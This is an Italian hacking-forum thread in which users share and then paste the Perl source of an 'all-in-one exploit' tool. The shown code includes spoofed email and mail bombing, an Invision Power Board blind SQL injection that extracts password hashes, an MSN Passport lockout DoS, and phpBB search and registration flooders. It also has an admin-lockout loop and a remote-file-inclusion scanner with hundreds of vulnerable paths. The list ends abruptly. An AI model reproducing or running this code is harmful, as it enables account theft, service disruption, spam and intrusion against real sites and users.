+ Sottoscrivi al topic
Pagina 1 di 3 123 UltimaUltima
Risultati da 1 a 10 di 26
Albero dei 5Ringraziamenti

[RELEASE]Exploit 17 funzioni

  1. 29-03-11 #1
    Carbo SlowStyle
    Carbo SlowStyle è offline
    L'avatar di Carbo SlowStyle
    Registrato da
    Nov 2009
    Messaggi
    2,411
    Reputazione
    81
    Piaciuto
    181
    Autore del Topic Uomo
    Cercando nel web ho trovato questo exploit.
    Vi lascio qua sotto uno screen.

    Per avviarlo dovrete installare ActivePerl.
    • Istruzioni •
    Installare ActivePerl
    Download ActivePerl --> Download ActivePerl
    • Una volta finita l'installazione,aprire il file .pl
    • Download file .pl (exploit) --> zSHARE - Exploit.pl - Free File Hosting Service | Audio and Video Sharing | Image Uploading | Web storage
    • L'antivirus lo riconosce come virus,bhè non chiedetemi il perchè,è ovvio
    • Per chi non sapesse cosa è --> Exploit - Wikipedia

    Fonti: Web e guida mia.

    Si accettano +1.
    Ultima modifica di Carbo SlowStyle; 29-03-11 alle 06:28
    A Alan™ Aka Santya95 piace questo elemento.
    Per qualsiasi problema non esitate a contattarmi tramite PM.
    Rispondi Citando Rispondi Citando
    2. Advertiser
  2. 29-03-11 #2
    Marco_Mod
    Marco_Mod è offline
    L'avatar di Marco_Mod
    Registrato da
    Nov 2007
    Messaggi
    293
    Reputazione
    7
    Piaciuto
    87
    Blog
    1
    guida a cosa? t'avrei dato un +1 se avessi illustrato passo passo ogni opzione per dar modo a un'utente di capire COSA fanno, non COME FARLO. e ci risiamo, l'apoteosi dello SK.
    Did I ever tell you the definition of insanity?
    Insanity is doing the exact same fking thing over and over again, expecting shit to change. doing the exact same fking thing over and over and over again thinking this time, its gonna be different... This. Is. Crazy.


    Rispondi Citando Rispondi Citando
  3. 29-03-11 #3
    murdercode
    murdercode è offline
    L'avatar di murdercode
    Fondatore
    Registrato da
    Nov 2007
    Messaggi
    2,651
    Reputazione
    143
    Piaciuto
    1722
    Blog
    6
    Uomo
    Come dice Marco, un topic così non da molte informazioni ad un eventuale newbie nel settore, che si vedrà limitato a fare il lamerone nel fine settimana.
    Ma un source può essere sempre utile, ergo lo copio qui senza passare per zshare
    Codice:
    #!/usr/bin/perl
# Script Powered By
#     .___          .__.__                                       
#   __| _/_______  _|__|  |   _____   __ _________  ____   ____ 
#  / __ |/ __ \  \/ /  |  |   \__  \ |  |  \_  __ \/  _ \ /    \
# / /_/ \  ___/\   /|  |  |__  / __ \|  |  /|  | \(  <_> )   |  \
# \____ |\___  >\_/ |__|____/ (____  /____/ |__|   \____/|___|  /
#      \/    \/                    \/                         \/
system (cls);
print q{
 ________________________________________________________________
|________________________________________________________________|
|                -Devil Auron All In One Exploit-                |
|                       _Devil Ghost Crew_                       |
|              => www.devilghost.altervista.org <=               |
|________________________________________________________________|
|                         SCEGLI COSA FARE                       |
|________________________________________________________________|
|                                                                |
|1 - Invia Fake Mail            10 - MyBB <= 1.1.3 Create Admin  |
|2 - IPB <=2.0.4 Hack           11 - DeluxeBB 1.0.6 SQl Injection|
|3 - Msn Flood                  12 - PostNuke pnFlashGames SQL   |
|4 - PhpBB <= 2.0.19 Flooder    13 - Naviga Anonimo              |
|5 - PhpBB <= 2.0.21 Flooder    14 - Effettua Whois Sito         |
|6 - PhpBB 2.0.20 Disable Admin 15 - Effettua Whois Ip           |
|7 - Mail Bomber                16 - Cerca Exploit               |
|8 - MD5 Crack                  17 - Vai Al Sito                 |
|9 - RFI Scanner                18 - About                       |
|________________________________________________________________|
|_____________________________[v4.1]_____________________________|
};
print "Inserisci Numero Exploit: ";
$decision = <STDIN>;
&inizio;
sub inizio{
if ($decision == 1)
{
print "Indirizzo provider: ";
$prov = <STDIN>;
chomp($prov);
print "Da: ";
$from = <STDIN>;
chomp($from);
$from =~ /@/ || die "Indirizzo di posta non consentiton";
$helo = $';
print "A: ";
$to = <STDIN>;
chomp($to);
$to =~ /@/ || die "Indirizzo di posta non consentiton";
print "Oggetto: ";
$subj = <STDIN>;
chomp($subj);
print "Messaggio: ";
$mex = <STDIN>;
chomp($mex);
$d = localtime;

print "n";
print "Sto inviando la mail...n";

use Net::SMTP;

print "Connessione al server SMTP... n";
$smtp = Net::SMTP->new("$prov", Hello => "provider", Timeout => 50) || die "Erorre di connessione al server SMTPn";
print "Connesso.n";
$smtp->mail("$from") || die "Indirizzo di origine non validon";
$smtp->to("$to") || die "Destinazione non validan";
print "Invio dati...n";
$smtp->data();
$smtp->datasend("From: $fromn");
$smtp->datasend("To: $ton");
$smtp->datasend("Date: $dn");
$smtp->datasend("Subject: $subjn");
$smtp->datasend("n");
$smtp->datasend("$mex");
$smtp->datasend("n");
print "Dati inviati.n";
$smtp->dataend();
$smtp->quit;
print "Mail inviata con successo.nn";
}
elsif ($decision == 2)
{
use IO::Socket;
print "inserisci Host:";
$server=<STDIN>;
chomp($server);
print "inserisci cartella: ";
$path = <STDIN>;
chomp($path);
print "inserisci num. membro: ";
$member_id = <STDIN>;
chomp($member_id);
print "inserisci target: ";
$target = <STDIN>;
chomp($target);


$pass = ($target)?('member_login_key'):('password');

$server =~ s!(http:\/\/)!!;

$request  = 'http://';
$request .= $server;
$request .= $path;

$s_num = 1;
$|++;
$n = 0;

print "[~]    SERVER : $server\r\n";
print "[~]      PATH : $path\r\n";
print "[~] MEMBER ID : $member_id\r\n";
print "[~]    TARGET : $target";
print (($target)?(' - IPB 2.*'):(' - IPB 1.*'));
print "\r\n";
print "[~] SEARCHING PASSWORD ... [|]";

($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

while(1)
{
if(&found(47,58)==0) { &found(96,122); }
$char = $i;
if ($char=="0")
{
if(length($allchar) > 0){
print qq{\b\b DONE ]

MEMBER ID : $member_id
};
print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
print $allchar."\r\n";
}
else
{
print "\b\b FAILED ]";
}
exit();
}
else
{
 $allchar .= chr($char);
}
$s_num++;
}

sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }

$r = int($fmax - ($fmax-$fmin)/2);
$check = " BETWEEN $r AND $fmax";
if ( &check($check) ) { &found($r,$fmax); }
else { &found($fmin,$r); }
}

sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
 {
 $crcheck = "=$i";
 if ( &check($crcheck) ) { return $i; }
 $i++;
 }
$i = 0;
return $i;
}

sub check($)
{
$n++;
status();
$ccheck = $_[0];
$pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";
$pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28";
$pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";
$pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$nmalykh    = "%20%EC%E0%EB%FB%F5%20%2D%20%EF%E8%E4%E0%F0%E0%F1%21%20";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");

printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s;

pass_hash=%s%s%s%s%s\nConnection: close\n\n",
 $path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3,$nmalykh);

while(<$socket>)
 {
 if (/Set-Cookie: session_id=0;/) { return 1; }
 }

return 0;
}

sub status()
{
 $status = $n % 5;
 if($status==0){ print "\b\b/]";  }
 if($status==1){ print "\b\b-]";  }
 if($status==2){ print "\b\b\\]"; }
 if($status==3){ print "\b\b|]";  }
}

sub usage()
{
print q(
Invision Power Board v < 2.0.4 SQL injection exploit
----------------------------------------------------
USAGE:
~~~~~~
r57ipb2.pl [server] [/folder/] [member_id] [target]

[server]    - host where IPB installed
[/folder/]  - folder where IPB installed
[member_id] - user id for brute

targets:
         0 - IPB 1.*
         1 - IPB 2.* (Prior To 2.0.4)

e.g. r57ipb2.pl 127.0.0.1 /IPB/ 1 1
----------------------------------------------------
(c)oded by 1dt.w0lf
RST/GHC , http://rst.void.ru , http://ghc.ru
);
exit();
}
}
elsif ($decision == 3)
{

use IO::Socket;

if(!defined($TARGET)) {

print "scrivi indirizzo di posta: ";
$TARGET = <STDIN>;
$PORT = "80";
$SERVER = "login.passport.com";
$PASSWORD = "****MSN"; # MSNs nobody like them, fux0r them ... ;>
$KEYS =

"lc=1033,id=507,tw=40,fs=1,ru=http%3A%2F%2Fmessenger%2Emsn%2Ecom,ct=1131803266,kpp=1,kv=7,ver=2.1.6000.1,rn=Oyx2lzO3,tpf=a9aa

21fdbc1350435849d9fd05849cb7";
$NUMBER = "99999999999999999999999999999999999999999999999999999";

$COMMAND1 = "GET /login2.srf HTTP/1.0";
$COMMAND2 = "Accept: */*";
$COMMAND3 = "Authorization: Passport1.4

OrgVerb=GET,OrgURL=http%3A%2F%2Fmessenger%2Emsn%2Ecom,sign-in=$TARGET,pwd=$PASSWORD,$KEYS";

print "=================================================\n";
print "--- MSN Passport accounts remote DoS by _6mO_HaCk\n";
print "--- MorX Security Research Team www.MorX.org\n";
print "=================================================\n";
print "[+] Attacking $TARGET ...\n";
print "[-] CTRL + C To Stop\n";
for($count=0;$count<=$NUMBER;$count++)
{
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$SERVER",PeerPort=>"$PORT")
|| die "Can't connect to $SERVER";
print $remote "$COMMAND1\n$COMMAND2\n$COMMAND3\n\n";
$remote->autoflush();
}
print "Done, try again if needed :D";
}


}
elsif ($decision == 4)
{
use IO::Socket;


$x = 0;

print q(
=> Scrivi l'url del sito senza aggiungere http & www
=> Url: );
$host = <STDIN>;
chop ($host);

print q(
=> Adesso indica in quale cartella e posto il phpbb
=> di solito si trova su /phpBB2/ o /forum/
=> Cartella: );
$pth = <STDIN>;
chop ($pth);

print q(
=> Occhio usa un proxy prima di effettuare l'attacco
=> il tuo ip verra spammato sul pannello admin del forum
=> Per avviare l'exploit scrivi " hacking "
=> );
$type = <STDIN>;
chop ($type);


if($type == 1){

while($x != 0000)
{

$x++;
}


}
elsif ($type == hacking){

while($x != 300000)
{

$postit = "search_keywords=SpiderZ&return_chars=800";


$lrg = length $postit;


my $sock = new IO::Socket::INET (
                                 PeerAddr => "$host",
                                 PeerPort => "80",
                                 Proto => "tcp",
                                );
die "\nConnessione non riuscita: $!\n" unless $sock;


print $sock "POST $pth"."search.php?mode=results HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);


syswrite STDOUT, ".";


$x++;
}
exit; }
}
elsif ($decision == 5)
{

use IO::Socket;


print q(-----ROSSI46GO  phpbb <=2.0.21 registration flood-----

----Work only with Visualcode on registration disabled----

);
print q(-----------------------------------------------------------------
);
print q(
Inserisci l'host :  [www.esempio.it]
);
$host = <STDIN>;
chop ($host);
$host =~ s/http:\/\///ge;

print q(
Inserisci la Path del forum :  (/phpBB2/ oppure /)
);
$pth = <STDIN>;
chop ($pth);

print q(
Inserisci il nick da usare per il flood di registrazioni :  (nick)
);
$nick = <STDIN>;
chop ($nick);

print q(
Inserisci il numero di flood di registrazioni :  (numero)
);
$n = <STDIN>;
chop ($n);
$status = 0;
$cont = 0;


print "\n\nFlood in corso -";

while($cont<$n)
{


$uname = "username=" . "$nick" . "$cont";
$umail = "&email=" . "$nick" . "$cont";
$postit =

"$uname"."$umail"."%40hackers.it&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&oc

cupation=&interests=&signature=&viewemail=0&hideonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowh

tml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&subm

it=Submit";
$lrg = length $postit;

my $sock = new IO::Socket::INET ( PeerAddr => "$host", PeerPort => "80", Proto => "tcp",);

print $sock "POST $pth"."profile.php HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash,

application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Connection: Keep-Alive\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);

$cont++;

}
print "\n\nFlood Completato.\n\n";
}
elsif ($decision == 6)
{

print "Inserisci Host: ";
$host= <STDIN>;
chomp ($host);
print "Inserisci Directory: ";
$dirc= <STDIN>;
chomp ($dirc);
print "Inserisci Porta (In genere N. 80): ";
$port=<STDIN>;
chomp ($port);
print "Inserisci Admin: ";
$user=<STDIN>;
chomp ($user);

$dirsend = "$dirc" . "login.php";
print "
-------------------------------------
phpbb-Disable-user.php
--------------------------------------
";
$i=1;
if ($host ne ""){
while($OK ne 1){


use IO::Socket;
my($socket) ="";
if ($socket = IO::Socket::INET->new(PeerAddr => $host ,
PeerPort => $port ,
Proto => "TCP"))
{


$password=rand();
$data = "username="."$user"."&password="."$password"."&red irect=&login=Connexion
";
$length = length $data;
print $socket "POST $dirsend HTTP/1.1
Host: $host
Content-Type: application/x-www-form-urlencoded
Content-Length: $length

$data";
read $socket, $answer, 15;
close($socket);
}
if($answer =~ /HTTP\/(.*?) 302/){$OK = 1;}
$i=$i+"1";
print "$answer
";
print "Send Packet $i ....
" ;

}} }
elsif ($decision == 7)
{print "Indirizzo provider: ";
$prov = <STDIN>;
chomp($prov);
print "Da: ";
$from = <STDIN>;
chomp($from);
$from =~ /@/ || die "Indirizzo di posta non consentiton";
$helo = $';
print "A: ";
$to = <STDIN>;
chomp($to);
$to =~ /@/ || die "Indirizzo di posta non consentiton";
print "Oggetto: ";
$subj = <STDIN>;
chomp($subj);
print "Messaggio: ";
$mex = <STDIN>;
chomp($mex);
$d = localtime;
print "Quante mail vuoi inviare?\n";
$hmt=<STDIN>;
chomp($hmt);

print "n";
print "Sto inviando la mail...n";

while($hmt > 0){

use Net::SMTP;

print "Connessione al server SMTP... n";
$smtp = Net::SMTP->new("$prov", Hello => "provider", Timeout => 50) || die "Erorre di connessione al server SMTPn";
print "Connesso.n";
$smtp->mail("$from") || die "Indirizzo di origine non validon";
$smtp->to("$to") || die "Destinazione non validan";
print "Invio dati...n";
$smtp->data();
$smtp->datasend("From: $fromn");
$smtp->datasend("To: $ton");
$smtp->datasend("Date: $dn");
$smtp->datasend("Subject: $subjn");
$smtp->datasend("n");
$smtp->datasend("$mex");
$smtp->datasend("n");
print "Dati inviati.n";
$smtp->dataend();
$smtp->quit;
print "Mail inviate con successo.nn";
} }
elsif ($decision == 8)
{
use IO::Socket::INET;
print q{
###################################
#      MD5 CraCker r3dn0ize       #
#        Coded by Venom           #
#       www.NoRegress.tk          #
###################################
};

print "\n\t[ Hash or Text ]\n";
print "\n=>\t\t\t";
$q = <STDIN>;
chomp($q);
print "\n\t[ Querying database.. ]\n";

$sock = IO::Socket::INET->new(
PeerAddr => 'www.md5.rednoize.com',
PeerPort => '80',
PeerProt => 'tcp',
Timeout  => '1'
) || die "\n=>Error: Retry\n";

print $sock "GET /?q=$q&_= HTTP/1.1\n";
print $sock "Host: www.md5.rednoize.com\n";
print $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3\n\n";
print $sock "Accept: text/javascript, text/html, application/xml, text/xml, */*\n\n";
print $sock "Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3\n\n";
print $sock "Accept-Encoding: gzip,deflate\n\n";
print $sock "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n\n";
print $sock "Keep-Alive: 300\n\n";
print $sock "Connection: keep-alive\n\n";
@res = <$sock>;
close($sock);

@res[77] =~ s/<div id="result" >//gi;
chop(@res[77]);
chop(@res[77]);
chop(@res[77]);
chop(@res[77]);
chop(@res[77]);
chop(@res[77]);
chop(@res[77]);
open TXT,">>md5.txt";
print TXT "$q @res[77]\n";
print "\n=>@res[77]\n";
print "\n\t[ Done & Stored! ]\n\n";
}
elsif ($decision == 9)
{
use HTTP::Request;
use LWP::UserAgent;

&inizio;
sub inizio{
print q(
  ###########################
     Rfi vulnz scanner
       by The[Boss]
  ###########################
);
print "\n Insert host:(ex: http://www.site.com/)\n";
$host=<STDIN>;
chomp($host);
print "Ok lets scan..\n";
$rfi1="includes/header.php?systempath=";
$rfi2="Gallery/displayCategory.php?basepath=";
$rfi3="index.inc.php?PATH_Includes=";
$rfi4="nphp/nphpd.php?nphp_config[LangFile]=";
$rfi5="include/db.php?GLOBALS[rootdp]=";
$rfi6="ashnews.php?pathtoashnews=";
$rfi7="ashheadlines.php?pathtoashnews=";
$rfi8="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi9="demo/includes/init.php?user_inc=";
$rfi10="jaf/index.php?show=";
$rfi11="inc/shows.inc.php?cutepath=";
$rfi12="poll/admin/common.inc.php?base_path=";
$rfi13="pollvote/pollvote.php?pollname=";
$rfi14="sources/post.php?fil_config=";
$rfi15="modules/My_eGallery/public/displayCategory.php?basepath=";
$rfi16="bb_lib/checkdb.inc.php?libpach=";
$rfi17="include/livre_include.php?no_connect=lol&chem_absolu=";
$rfi18="index.php?from_market=Y&pageurl=";
$rfi19="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$rfi20="pivot/modules/module_db.php?pivot_path=";
$rfi21="modules/4nAlbum/public/displayCategory.php?basepath=";
$rfi22="derniers_commentaires.php?rep=";
$rfi23="modules/coppermine/themes/default/theme.php?THEME_DIR=";
$rfi24="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
$rfi25="modules/coppermine/themes/coppercop/theme.php?THEME_DIR=";
$rfi26="coppermine/themes/maze/theme.php?THEME_DIR=";
$rfi28="allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=";
$rfi29="allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=";
$rfi30="myPHPCalendar/admin.php?cal_dir=";
$rfi31="agendax/addevent.inc.php?agendax_path=";
$rfi32="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$rfi33="modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=";
$rfi34="main.php?page=";
$rfi35="default.php?page=";
$rfi36="index.php?action=";
$rfi37="index1.php?p=";
$rfi38="index2.php?x=";
$rfi39="index2.php?content=";
$rfi40="index.php?conteudo=";
$rfi41="index.php?cat=";
$rfi42="include/new-visitor.inc.php?lvc_include_dir=";
$rfi43="modules/agendax/addevent.inc.php?agendax_path=";
$rfi44="shoutbox/expanded.php?conf=";
$rfi45="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi46="pivot/modules/module_db.php?pivot_path=";
$rfi47="library/editor/editor.php?root=";
$rfi48="library/lib.php?root=";
$rfi49="e107/e107_handlers/secure_img_render.php?p=";
$rfi50="zentrack/index.php?configFile=";
$rfi51="main.php?x=";
$rfi52="becommunity/community/index.php?pageurl=";
$rfi53="GradeMap/index.php?page=";
$rfi54="phpopenchat/contrib/yabbse/poc.php?sourcedir=";
$rfi55="calendar/calendar.php?serverPath=";
$rfi56="calendar/functions/popup.php?serverPath=";
$rfi57="calendar/events/header.inc.php?serverPath=";
$rfi58="calendar/events/datePicker.php?serverPath=";
$rfi59="calendar/setup/setupSQL.php?serverPath=";
$rfi60="calendar/setup/header.inc.php?serverPath=";
$rfi61="mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=";
$rfi62="zentrack/index.php?configFile=";
$rfi63="pivot/modules/module_db.php?pivot_path=";
$rfi64="inc/header.php/step_one.php?server_inc=";
$rfi65="install/index.php?lng=../../include/main.inc&G_PATH=";
$rfi66="inc/pipe.php?HCL_path=";
$rfi67="include/write.php?dir=";
$rfi68="include/new-visitor.inc.php?lvc_include_dir=";
$rfi69="includes/header.php?systempath=";
$rfi70="support/mailling/maillist/inc/initdb.php?absolute_path=";
$rfi71="coppercop/theme.php?THEME_DIR=";
$rfi72="zentrack/index.php?configFile=";
$rfi73="pivot/modules/module_db.php?pivot_path=";
$rfi74="inc/header.php/step_one.php?server_inc=";
$rfi75="install/index.php?lng=../../include/main.inc&G_PATH=";
$rfi76="inc/pipe.php?HCL_path=";
$rfi77="include/write.php?dir=";
$rfi78="include/new-visitor.inc.php?lvc_include_dir=";
$rfi79="includes/header.php?systempath=";
$rfi80="support/mailling/maillist/inc/initdb.php?absolute_path=";
$rfi81="coppercop/theme.php?THEME_DIR=";
$rfi82="becommunity/community/index.php?pageurl=";
$rfi83="shoutbox/expanded.php?conf=";
$rfi84="agendax/addevent.inc.php?agendax_path=";
$rfi85="myPHPCalendar/admin.php?cal_dir=";
$rfi86="yabbse/Sources/Packages.php?sourcedir=";
$rfi87="dotproject/modules/projects/addedit.php?root_dir=";
$rfi88="dotproject/modules/projects/view.php?root_dir=";
$rfi89="dotproject/modules/projects/vw_files.php?root_dir=";
$rfi90="dotproject/modules/tasks/addedit.php?root_dir=";
$rfi91="dotproject/modules/tasks/viewgantt.php?root_dir=";
$rfi92="My_eGallery/public/displayCategory.php?basepath=";
$rfi93="modules/My_eGallery/public/displayCategory.php?basepath=";
$rfi94="modules/4nAlbum/public/displayCategory.php?basepath=";
$rfi95="modules/coppermine/themes/default/theme.php?THEME_DIR=";
$rfi96="modules/agendax/addevent.inc.php?agendax_path=";
$rfi97="modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi98="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi99="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
$rfi100="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$rfi101="shoutbox/expanded.php?conf=";
$rfi102="pivot/modules/module_db.php?pivot_path=";
$rfi103="library/editor/editor.php?root=";
$rfi104="library/lib.php?root=";
$rfi105="e107/e107_handlers/secure_img_render.php?p=";
$rfi106="main.php?x=";
$rfi107="main.php?page=";
$rfi108="index.php?meio.php=";
$rfi109="index.php?include=";
$rfi110="index.php?inc=";
$rfi111="index.php?page=";
$rfi112="index.php?pag=";
$rfi113="index.php?p=";
$rfi114="index.php?x=";
$rfi115="index.php?open=";
$rfi116="index.php?visualizar=";
$rfi117="index.php?pagina=";
$rfi118="index2.php?content=";
$rfi119="inc/step_one_tables.php?server_inc=";
$rfi120="GradeMap/index.php?page=";
$rfi121="phpshop/index.php?base_dir=";
$rfi122="admin.php?cal_dir=";
$rfi123="contacts.php?cal_dir=";
$rfi124="convert-date.php?cal_dir=";
$rfi125="album_portal.php?phpbb_root_path=";
$rfi126="mainfile.php?MAIN_PATH=";
$rfi127="dotproject/modules/files/index_table.php?root_dir=";
$rfi128="html/affich.php?base=";
$rfi129="gallery/init.php?HTTP_POST_VARS=";
$rfi130="pm/lib.inc.php?pm_path=";
$rfi131="ideabox/include.php?gorumDir=";
$rfi132="index2.php?includes_dir=";
$rfi133="forums/toplist.php?phpbb_root_path=";
$rfi134="forum/toplist.php?phpbb_root_path=";
$rfi135="admin/config_settings.tpl.php?include_path=";
$rfi136="include/common.php?include_path=";
$rfi137="event/index.php?page=";
$rfi138="forum/index.php?includeFooter=";
$rfi139="forums/index.php?includeFooter=";
$rfi140="forum/bb_admin.php?includeFooter=";
$rfi141="forums/bb_admin.php?includeFooter=";
$rfi142="language/lang_english/lang_activity.php?phpbb_root_path=";
$rfi143="forum/language/lang_english/lang_activity.php?phpbb_root_path=";
$rfi144="blend_data/blend_common.php?phpbb_root_path=";
$rfi145="master.php?root_path=";
$rfi146="includes/kb_constants.php?module_root_path=";
$rfi147="forum/includes/kb_constants.php?module_root_path=";
$rfi148="forums/includes/kb_constants.php?module_root_path=";
$rfi149="classes/adodbt/sql.php?classes_dir=";
$rfi150="agenda.php3?rootagenda=";
$rfi151="agenda2.php3?rootagenda=";
$rfi152="sources/lostpw.php?CONFIG[path]=";
$rfi153="topsites/sources/lostpw.php?CONFIG[path]=";
$rfi154="toplist/sources/lostpw.php?CONFIG[path]=";
$rfi155="sources/join.php?CONFIG[path]=";
$rfi156="topsites/sources/join.php?CONFIG[path]=";
$rfi157="toplist/sources/join.php?CONFIG[path]=";
$rfi158="topsite/sources/join.php?CONFIG[path]=";
$rfi159="public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=";
$rfi160="extras/poll/poll.php?file_newsportal=";
$rfi161="index.php?site_path=";
$rfi162="mail/index.php?site_path=";
$rfi163="fclick/show.php?path=";
$rfi164="show.php?path=";
$rfi165="calogic/reconfig.php?GLOBALS[CLPath]=";
$rfi166="eshow.php?Config_rootdir=";
$rfi167="auction/auction_common.php?phpbb_root_path=";
$rfi168="index.php?inc_dir=";
$rfi169="calendar/index.php?inc_dir=";
$rfi170="modules/TotalCalendar/index.php?inc_dir=";
$rfi171="modules/calendar/index.php?inc_dir=";
$rfi172="calendar/embed/day.php?path=";
$rfi173="ACalendar/embed/day.php?path=";
$rfi174="calendar/add_event.php?inc_dir=";
$rfi175="claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=";
$rfi176="claroline/auth/ldap/authldap.php?includePath=";
$rfi177="docebo/modules/credits/help.php?lang=";
$rfi178="modules/credits/help.php?lang=";
$rfi179="config.php?returnpath=";
$rfi180="editsite.php?returnpath=";
$rfi181="in.php?returnpath=";
$rfi182="addsite.php?returnpath=";
$rfi183="includes/pafiledb_constants.php?module_root_path=";
$rfi184="phpBB/includes/pafiledb_constants.php?module_root_path=";
$rfi185="pafiledb/includes/pafiledb_constants.php?module_root_path=";
$rfi186="auth/auth.php?phpbb_root_path=";
$rfi187="auth/auth_phpbb/phpbb_root_path=";
$rfi188="apc-aa/cron.php3?GLOBALS[AA_INC_PATH]=";
$rfi189="apc-aa/cached.php3?GLOBALS[AA_INC_PATH]=";
$rfi190="infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=";
$rfi191="phpdig/includes/config.php?relative_script_path=";
$rfi192="includes/phpdig/includes/config.php?relative_script_path=";
$rfi193="includes/dbal.php?eqdkp_root_path=";
$rfi194="eqdkp/includes/dbal.php?eqdkp_root_path=";
$rfi195="dkp/includes/dbal.php?eqdkp_root_path=";
$rfi196="include/SQuery/gameSpy2.php?libpath=";
$rfi197="include/global.php?GLOBALS[includeBit]=";
$rfi198="topsites/config.php?returnpath=";
$rfi199="manager/frontinc/prepend.php?_PX_config[manager_path]=";
$rfi200="ubbthreads/addpost_newpoll.php?addpoll=thispath=";
$rfi201="forum/addpost_newpoll.php?thispath=";
$rfi202="forums/addpost_newpoll.php?thispath=";
$rfi203="ubbthreads/ubbt.inc.php?thispath=";
$rfi204="forums/ubbt.inc.php?thispath=";
$rfi205="forum/ubbt.inc.php?thispath=";
$rfi206="forum/admin/addentry.php?phpbb_root_path=";
$rfi207="admin/addentry.php?phpbb_root_path=";
$rfi208="index.php?f=";
$rfi209="index.php?act=";
$rfi210="ipchat.php?root_path=";
$rfi211="includes/orderSuccess.inc.php?glob[rootDir]=";
$rfi212="stats.php?dir[func]=dir[base]=";
$rfi213="ladder/stats.php?dir[base]=";
$rfi214="ladders/stats.php?dir[base]=";
$rfi215="sphider/admin/configset.php?settings_dir=";
$rfi216="admin/configset.php?settings_dir=";
$rfi217="vwar/admin/admin.php?vwar_root=";
$rfi218="modules/vwar/admin/admin.php?vwar_root=";
$rfi219="modules/vWar_Account/includes/get_header.php?vwar_root=";
$rfi220="modules/vWar_Account/includes/functions_common.php?vwar_root2=";
$rfi221="sphider/admin/configset.php?settings_dir=";
$rfi222="admin/configset.php?settings_dir=";
$rfi223="impex/ImpExData.php?systempath=";
$rfi224="forum/impex/ImpExData.php?systempath=";
$rfi225="forums/impex/ImpExData.php?systempath=";
$rfi226="application.php?base_path=";
$rfi227="index.php?theme_path=";
$rfi228="become_editor.php?theme_path=";
$rfi229="add.php?theme_path=";
$rfi230="bad_link.php?theme_path=";
$rfi231="browse.php?theme_path=";
$rfi232="detail.php?theme_path=";
$rfi233="fav.php?theme_path=";
$rfi234="get_rated.php?theme_path=";
$rfi235="login.php?theme_path=";
$rfi236="mailing_list.php?theme_path=";
$rfi237="new.php?theme_path=";
$rfi238="modify.php?theme_path=";
$rfi239="pick.php?theme_path=";
$rfi240="power_search.php?theme_path=";
$rfi241="rating.php?theme_path=";
$rfi242="register.php?theme_path=";
$rfi243="review.php?theme_path=";
$rfi244="rss.php?theme_path=";
$rfi245="search.php?theme_path=";
$rfi246="send_pwd.php?theme_path=";
$rfi247="sendmail.php?theme_path=";
$rfi248="tell_friend.php?theme_path=";
$rfi249="top_rated.php?theme_path=";
$rfi250="user_detail.php?theme_path=";
$rfi251="user_search.php?theme_path=";
$rfi252="invoice.php?base_path=";
$rfi253="cgi-bin//classes/adodbt/sql.php?classes_dir=";
$rfi254="cgi-bin/install/index.php?G_PATH=";
